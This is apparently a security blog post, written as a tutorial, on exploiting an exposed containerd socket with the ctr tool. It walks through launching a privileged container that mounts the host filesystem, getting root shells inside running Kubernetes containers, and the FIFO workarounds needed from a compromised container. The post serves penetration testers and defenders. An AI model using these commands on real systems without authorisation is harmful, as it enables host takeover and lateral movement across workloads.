- The containerd socket
- The ctr tool
- List namespaces
- List running containers in namespace
- Running our own containers
- Executing code in running containers
- Deleting a container
A common technique used by attackers in containerised environments is exploitation of the container runtime socket to move laterally or escalate privileges. This socket can be accessed by attackers when the socket is exposed directly in an exploited container or when the the attacker can access the containing hosts file system, usually with root privileges.
Once the attacker can access the socket file with write permissions, they can then communicate with it in various ways to run new containers or execute code in existing ones. The specifics of how this is done differ depending on the container runtime in use. If the runtime is Docker, there is a lot of available information on how to use the socket offensively. Exploitation with commonly available tools like curl is quite straightforward because the Docker API uses REST, allowing you to perform container admin tasks using plain text HTTP requests.
One such example of an article on how exploit the Docker socket using this approach is here.
Another container runtime thats getting an increasing amount of use is containerd, which has a different and more complex API than Docker. There also isn’t a lot of available information on how to exploit the containerd socket. Given that Ive spent a bit of time playing with this myself, I thought I would share how to do this in a few blog posts. This post will cover how to use the ctr
admin tool to perform the exploitation, and a future post will discuss how to do this with curl
.
The containerd socket
The containerd socket has a default location of /var/run/containerd/containerd.sock
and is a named pipe file that is normally only accesible by the root user. (If you’re not familiar with how named pipe files work on Linux just think of them as like a TCP socket located in a named file on disk, which you can write to or read from using regular filesystem operations in order to communicate with “network” servers or clients that are doing the same). If you can manage to get write access to this socket file as a non-root user it does give you the ability to privilege escalate to root on the host as well as to access and manipulate any running container run by the daemon.
Most of the communication to the containerd runtime by orchestration tools such as Kubernetes and administration tools like ctr
are sent through the medium of this socket file, which uses the gRPC protocol for its messaging. gRPC uses Protobuf messages sent over HTTP/2, which makes it a little challenging to talk to using command line tools commonly available in many container images like curl
or wget
, although it is possible, as we will see in a future post. Given the overhead of the “manual” approach however, its preferable to use actual containerd admin tools where this is an option, and thats what I will discuss in this post.
The ctr tool
The ctr
tool is the “unsupported” command line admin tool for the containerd runtime and is provided within the containerd release archive. If you can get this tool onto a system or container that can access the containerd socket, it can make the process of exploiting the runtime very straightforward.
The tool will by default try and access the socket at its default location of /var/run/containerd/containerd.sock
, however its possible to override this using the --address
parameter, and I’ll specifically reference this in the examples below.
Heres a simple example of using the tool to confirm communication to the socket is working by requesting version information from the server.
$ sudo ctr --address /var/run/containerd/containerd.sock version
Client:
Version: 1.7.24
Revision: 88bf19b2105c8b17560993bee28a01ddc2f97182
Go version: go1.22.9
Server:
Version: 1.7.24
Revision: 88bf19b2105c8b17560993bee28a01ddc2f97182
UUID: cc501e78-a8ad-4eff-8c02-58003ac69353
List namespaces
A useful first step when communicating to the containerd socket is listing the namespaces in use by the containerd runtime. This is because containers of interest to us may not be visible unless we get this parameter correct in the future calls we make to the API. We can list namespaces like so:
$ sudo ctr --address /var/run/containerd/containerd.sock ns ls
NAME LABELS
buildkit
default
k8s.io
Since the machine I am running this on happens to be a Kubernetes node, we can see the k8s.io
namespace in the list above - all the containers run by Kubernetes on this particular node will be accessible via this namespace only, and we will need to include the -n k8s.io
switch in all future commands to see these containers.
Its also likely that a system having this particular namespace will NOT be running containers in any other namespaces. The default
namespace is the one that will be used by default, and the one that will be referenced in all command executions that dont specify a particular namspace.
List running containers in namespace
The next thing we are going to do is list the running containers in the Kubernetes (k8s.io
) namespace, which we do like so:
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io containers list
CONTAINER IMAGE RUNTIME
01a91532d97f8f7162c477dd1e402520d313e9c4333827d74a93cde25dddc1cc registry.k8s.io/pause:3.6 io.containerd.runc.v2
05536e2ec91d018cdb4edac21ab613b22f0755721e082c99f81b87516bce60ec registry.k8s.io/pause:3.6 io.containerd.runc.v2
0894b4942001821ad9c36949ae7c15fc2dd9b54bf6e5d531b6e5b03e6f5e313c docker.io/calico/cni:v3.25.0 io.containerd.runc.v2
[SNIP]
3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 docker.io/library/springsaml:latest io.containerd.runc.v2
[SNIP]
The output of the above is a very long list of running containers with their container ID and associated image name. (Ive “snipped” the output in the interests of space). Given that these are Kubernetes containers, the container ids are very unhelpfully named using hashes, but the container IMAGE value can be somewhat useful in identifying which items are worth a closer look. In the above Ive made sure to include the listing for a container running an image docker.io/library/springsaml:latest
which we will examine further in later commands.
To get a lot more information about a given container, to see if its something we are interested in, we can run a command like the following. The command references the container id from the docker.io/library/springsaml:latest
entry from the output above.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io containers info 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694
{
"ID": "3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694",
"Labels": {
"io.cri-containerd.kind": "container",
"io.kubernetes.container.name": "springsaml",
"io.kubernetes.pod.name": "springsaml-86df7bc9c5-zqgn8",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "cc5f0b97-32f4-41fb-8182-4d2ea0ab8130"
},
"Image": "docker.io/library/springsaml:latest",
"Runtime": {
"Name": "io.containerd.runc.v2",
"Options": {
"type_url": "containerd.runc.v1.Options",
"value": "SAE="
}
},
[SNIP]
We can see from the above “snipped” message that this gives us a lot more information on the container, including some labels that allow us to identify associated Kubernetes parameters. We also get various metadata and environment variables associated with the container (excluded from above output).
Running our own containers
To run our own containers, we need to know what container image to use. The “correct” container image to use obviously depends on what we want to do with the container, but if we just want to achieve the common attacker scenario of running a privileged container with a host filesystem mount, almost any regular (non cut down) image will do. If we can find a suitable container image already available locally, this saves us the step of retreiving one, so lets check for a simple nginx
image in the locally stored list. We can do this via running image ls
and grepping the output like so:
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io image ls | grep nginx
docker.io/library/nginx:1.14.2 application/vnd.docker.distribution.manifest.list.v2+json sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d 42.6 MiB linux/386,linux/amd64,linux/arm/v7,linux/arm64/v8,linux/ppc64le,linux/s390x
If we dont find anything suitable for our purposes locally we can always image pull
something to get what we need, but in this case the image above is fine.
The command example below shows how we can use this nginx
image to run a privileged container with the hosts filesystem mounted at /host
.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io run --privileged --mount 'type=bind,src=/,dst=/host,options=rbind:rw' -d 'docker.io/library/nginx:1.14.2' nginx
No output from the command here is generally a good sign, but we can confirm that the container was correctly created by listing containers and grepping for nginx
(the container id we specified in the above command).
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io container ls | grep nginx
3bd8e95274f34f1ecf0b11e19f52127361327742e40ae707ac5613f1365f2e71 docker.io/library/nginx:1.14.2 io.containerd.runc.v2
8ebece262e1762688c8f8adf80fe6d017e2043523a0d74f5812530b38524e149 docker.io/library/nginx:1.14.2 io.containerd.runc.v2
nginx docker.io/library/nginx:1.14.2 io.containerd.runc.v2
Our newly created container can be seen in the output above, standing out because its container ID is not a long hash value.
Executing code in running containers
Now lets look at how we execute code in running containers. We will do this both in one of the already running containers as well as in our newly created one.
First lets do this in the existing container that we looked at earlier - the one with id 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694
.
If we then want to run a single command inside this container, and get the output, we can do this as follows (running cat /etc/passwd
).
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io task exec --exec-id catpwd 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
If we want an interactive shell into the container, we add the -t
switch to allocate a TTY and run /bin/bash
instead.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io task exec -t --exec-id catpwd 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 /bin/bash
root@springsaml-86df7bc9c5-zqgn8:/app# hostname
springsaml-86df7bc9c5-zqgn8
root@springsaml-86df7bc9c5-zqgn8:/app#
Now lets do the same in our nginx
container that we created earlier.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io task exec -t --exec-id catpwd nginx /bin/bash
root@kubecontainer:/# ls /host
bin boot dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv swap.img sys tmp usr var
In the above, we see that the container is running as root
and that the host filesystem is mounted to /host
, just like we specified when we created it.
Now, while these particular examples of executing code in containers worked fine, its worth diving into into some more detail of how this works. This is because there are some details under the hood that can cause problems for us in certain situations.
First of all, the stdin
, stdout
and stderr
channels of the tasks/processes created in the container are NOT communicated with by means of the API itself. These are instead are specified in the form of named pipe files that the calling application (in this case ctr
) needs to create and handle communication with.
Whats more, when using ctr
, the ctr
tool and the containerd
daemon need to use the same filenames for each of these pipes. This is a problem when these two applications (or the systems running them) dont share the same root filesystem. This can happen when we are accessing the socket via a mount within a container (which is the most likely scenario where exploitation of this socket will actually be useful).
In these cases, to actually directly access these process handles directly using ctr
, we need to utilise a shared section of the filesystem that both client and server can access via the same named path, and inform the ctr
tool of this path using the --fifo-dir
switch.
Lets take an example where we are running ctr
from within a compromised container where the hosts root filesystem is mounted at /host
in the container. In this case (assuming we dont just chroot within the container), the containerd socket is being accessed from the path /host/run/containerd/containerd.sock
. To make an interactive shell like the example above work, we can create a path /tmp/offsec
on the host filesystem (via creating /host/tmp/offsec
in our container) and then symbolically link this path to the same path /tmp/offsec
in the container. Then we exec the task pointing to /host/run/containerd/containerd.sock
as the socket address and /tmp/offsec
as the FIFO path.
An example of commands to achieve this would look something like the following:
$ mkdir /host/tmp/offsec
$ ln -s /host/tmp/offsec /tmp/offsec
$ ctr --address /host/run/containerd/containerd.sock -n k8s.io task exec -t --exec-id catpwd --fifo-dir /tmp/offsec 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 /bin/bash
Another factor to pay attention to is the --exec-id
parameter. This is a mandatory parameter that we have to provide on each use of this command, and can be set to any string value. The reason for this parameter is that these exec operations we have been providing actually involve a number of different underlying API calls - one to create the task (define the process details), another to start it (run the process), and another to remove the task once its no longer needed. All of these steps are tied together via their associated API calls using a common exec-id
.
When we run commands via the ctr
tool we usually dont need to care too much about this unless theres an error. So, we can run multiple different subsequent (but not simultaneous) commands using the same exec-id
without a problem. However, if theres a cleanup problem with a task run with ctr
, or when we make the API calls directly ourselves, we will get an error message when we try and create a task with an exec-id
that already exists The error message will be similar to id catpwd: already exists
.
If we happen to “break” any tasks, we can clean them up with ctr
like in the following example. This is for a broken task catpwd
in container 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694
:
$ sudo ctr -n k8s.io tasks delete 3373c8e99b9381b150d30998203cbb6593f1e25b4c30a61f16669f9f8b5d8694 --exec-id catpwd
Deleting a container
Now lets clean up the container we created earlier. This involves stopping it (killing its associated task) and then deleting the container like so.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io task kill nginx
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io container delete nginx
Now we confirm that its gone.
$ sudo ctr --address /var/run/containerd/containerd.sock -n k8s.io container ls | grep nginx
3bd8e95274f34f1ecf0b11e19f52127361327742e40ae707ac5613f1365f2e71 docker.io/library/nginx:1.14.2 io.containerd.runc.v2
8ebece262e1762688c8f8adf80fe6d017e2043523a0d74f5812530b38524e149 docker.io/library/nginx:1.14.2 io.containerd.runc.v2
That covers off on the basic containerd exploitation steps using the ctr
tool. I will do a follow up post soon on performing these same tasks using curl
.